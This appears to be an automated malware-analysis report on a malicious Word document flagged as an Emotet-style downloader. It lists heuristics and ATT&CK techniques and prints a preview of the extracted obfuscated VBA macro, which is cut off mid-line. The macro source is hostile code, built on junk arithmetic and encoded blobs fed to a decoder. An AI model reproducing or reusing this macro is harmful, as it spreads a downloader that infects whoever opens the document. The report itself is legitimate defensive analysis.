MALICIOUS
Risk Score: 224
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The macro is triggered by the AutoOpen function and uses CreateObject, most likely to download and execute a second-stage payload, as indicated by the ClamAV detection 'Doc.Malware.Emodldr' and the presence of the extracted VBA macro file 'macros.bas'. The script is obfuscated, which prevents a more detailed analysis of its specific actions.
Heuristics (8)
- ClamAV: Doc.Malware.Emodldr-10025032-0 (critical) [CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
- VBA macros detected (medium, 3 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code
- AutoOpen macro (high) [OLE_VBA_AUTOOPEN]: AutoOpen macro
- CreateObject call (high) [OLE_VBA_CREATEOBJ]: CreateObject call
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info) [EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 36521 bytes |

SHA-256: 521e31a4d2e2c5bcdc638211da66b01bd5cb13150d1304044594cabaf86ed403
Detection (ClamAV): No threats found
Obfuscation or payload: likely. Carved artifact contains 15 long base64-like blob(s).
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "sLjZKKFDaVQdt"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "BWQkMshlQpJmV"
Function GiQjpjnQvYUVM()
On Error Resume Next
whlXUQ = 3123 * 38209
NHwKNC = (47085 + CDate(3430 / Atn(tAAUd)) / 73551 * cKYziK * 84511 * CInt(OJzdi) * qMqzZc / CSng(pZMGr))
OWsdE = Tan(99425)
pcqjvk = FlLNj("FFd3hYHquIm65XHCMe8f3G4ukZT0m84vmDnif6/bfxvBh3fN5aPQbg4izOtXTc31m+pdZjq3HhvFLjs/1qj3yQn9d8cn2u9Tmu77hfo7jEunSK99Lw2+tnzf1ifN8sPtH89D3dV/FSmp2", 4, 135)
sFdUIC = 29320 * 67198
DDuXhC = (76676 + CDate(19574 / Atn(DJTml)) / 22229 * qwcsVj * 90527 * CInt(lkkjVr) * NbtVJ / CSng(UiMii))
ApYFT = Tan(34275)
molVj = 86358 * 85473
vjSMC = (133 + CDate(58734 / Atn(FGhwmR)) / 18474 * trzaH * 43962 * CInt(nlOHGA) * ztHohs / CSng(okuZfR))
sTOViU = Tan(54502)
zzzOGciAc = FlLNj("cXG8mt0zmq+HvpXs89s3oFHBXnzxD4aUCfqluGoPNf9TFf2zNvqa32Z+m/h0D9pXqAu5BFxFPQ76leNc87mq/Ut8+X7LevVBfC3Jc8azv+kH6kv3QB8OuWt9Qv0ONYnI3/SHDg1HAP6M/GyC+g/61vkv0d9UH/UpUS9sW7PPsQz52ZLv9H5ND94joePMd1IujfG2XP6w2UP", 2, 197)
tRSYFf = 52706 * 77313
YhFHnr = (97279 + CDate(69853 / Atn(RFHFA)) / 53302 * auRzm * 52993 * CInt(XKApVJ) * TMwBBz / CSng(sFcQk))
DXhnQ = Tan(82327)
mXOwr = 60914 * 45207
GdHRR = (20018 + CDate(76934 / Atn(BpWVzb)) / 86835 * pYKppT * 50913 * CInt(iJJXF) * NCCKO / CSng(VjSNbF))
TXMRL = Tan(58015)
ztFwBS = FlLNj("SA71nwL0W/tkJ/C/mDX8Pw+8GV+AFft9Jvsb0VN68OZj8+O325lN593DRHH8s1//cbT5enF/XYTI57ieH+dnJySw7msS/k+Xm4Wbz8Lk5/319t/la3uivgIdHJ9/l/uPQnH/9cTI5nPz0b3k3v73ffDjfvN2clzfr8uThNm5Y3SwPj/7Mfsn/+vng8wMfTi", 3, 184)
GTVhj = 74972 * 5538
nIAQds = (54189 + CDate(38191 / Atn(nNzdJ)) / 11583 * OjRGAS * 85074 * CInt(tqCuhU) * btltKN / CSng(cJrDs))
whmzNY = Tan(38180)
QoFfh = 85623 * 76894
IXPUjq = (83683 + CDate(30918 / Atn(isJcH)) / 66641 * outfW * 12582 * CInt(RPAZZb) * MJNcZ / CSng(lIPlp))
YMHOnJ = Tan(10643)
lECOiOwt = FlLNj("fLaPYvJi5sL8V3lbyaWXvby9lfj8KGUv535+L8tBaplX8k7kyzBfyTun6071+ZOfv5eylA9eXsu7QTovmSx6cRK/X3ppvTzK0kknMpWFl0Zkpt/H57iujevnV7KspA3znf9A", 6, 125)
qnzIMC = 63859 * 96938
jQRoI = (34016 + CDate(67721 / Atn(AhUXji)) / 15193 * fhdJAN * 31267 * CInt(iQZKF) * XjmDf / CSng(XCQvY))
nbkYK = Tan(15990)
pTtlri = 70540 * 11233
YnRXI = (29206 + CDate(80669 / Atn(wGsdNI)) / 22712 * ncuZzI * 69324 * CInt(EUkES) * rUQYn / CSng(mNSqMY))
FuAbL = Tan(65368)
AiTJARo = FlLNj("ciwo5qRo4lyvwGfqcwzfqOSv0O/jBe8R43innPfxW6gP65pr+A/xYc25WnCvWb4/P/quHf8FcRH1Dmuu4V7l0nwhJb3F/MB+Z/Jb1J+sz0CeZP3ajr3zhDzmvwUfUqQc/k24u0xxqyTfzPfb7Rupf9F8gHtVYL/PzC/px6OGedw", 7, 163)
DCqjXP = 6762 * 32796
nilLl = (28660 + CDate(47891 / Atn(pUlCZ)) / 19210 * MbziG * 7953 * CInt(ZWVJpd) * AXWVui / CSng(bMZqV))
lqwuds = Tan(74864)
ukata = 42818 * 21002
KorOi = (69473 + CDate(90782 / Atn(ZLLkjz)) / 71119 * IBoVv * 26911 * CInt(QqwSK) * mTPOq / CSng(hwANsJ))
KfFlUw = Tan(99102)
JiaELNC = FlLNj("0DPbT/yc4p7ZedZ/XvG7Bk/HfaaoI/Hy0L9O8VxQz9DvPXm+R77Q23ge8Bmgx532ieqC8cFpXgX5s,1F2qB", 4, 74)
lZhpM = 93036 * 72126
XlRkam = (84559 + CDate(93314 / Atn(qVDXH)) / 76260 * LQDXLE * 54942 * CInt(LCBui) * djvXc / CSng(aZFYnI))
dbwhd = Tan(72022)
stJViI = 51550 * 77347
iiCwa = (7021 + CDate(92455 / Atn(KiqfcB)) / 55304 * kkOpi * 68391 * CInt(GHUkC) * bsjNl / CSng(izjaV))
njMvzQ = Tan(85541)
vXKoWbKH = FlLNj("On2po2Gc541AL8HzFvNv2VJ/bD5eATd9z/i0p07BLvc", 4, 36)
FzYLzv = 97711 * 19468
oGTtYi = (71796 + CDate(14067 / Atn(qutQB)) / 18135 * tqCLKJ * 8638 * CInt(WDdUXO) * HYDvUC / CSng(Pzboj))
zmowOT = Tan(11634)
WOKhMZ = 35392 * 415
jRnrj = (51411 + CDate(86366 / Atn(VLDPv)) / 90799 * nVzXiM * 67287 * CInt(jADPF) * dpwBTw / CSng(TfiFB))
Gjraa = Tan(36332)
ddDXwpuK = FlLNj("fioum5g7qA+Hn7XfCHqU1NnodN2HyqoJwV81ot5Cj+4Q77ww6n/0zw13mKOm/9u%", 6, 57)
trZuR = 83830 * 1875
GrcLnL = (83217 + CDate(42329 / Atn(NcwWU)) / 79801 * ShGcn * 80166 * CInt(dwnCm) * Bjbva / CSng(oCtNu))
NkMwU = Tan(90758)
JfcMdO = 87793 * 12448
DTaih = (19893 + CDate(863
... (truncated)